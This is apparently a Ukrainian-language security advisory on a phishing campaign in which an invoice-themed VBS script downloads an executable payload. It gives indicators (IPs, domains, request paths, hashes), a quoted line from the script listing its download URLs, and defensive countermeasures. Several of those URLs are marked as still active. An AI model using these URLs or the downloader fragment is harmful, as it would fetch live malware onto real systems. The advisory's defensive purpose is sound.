202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

завантаження >

File Name WwLlYA.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

другий скрипт

File Name Invoice_INV000104.vbs
SHA-256 Hash Identifier 919260CC38BF4F7B7BA93F716BA1D12DB4CDEF597F0A94C9036B8F8A16D99BCB
File Size 11743 bytes
File Type ASCII text

Plyask = Array("balzantruck.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","georginabringas.com/9hgfdfyr6?")

 

69.156.240.29      balzantruck.com          GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний
178.136.206.128   mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29        georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

завантаження >

File Name iYwHXKr.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
178.136.206.128    mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29         georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

не активні

69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR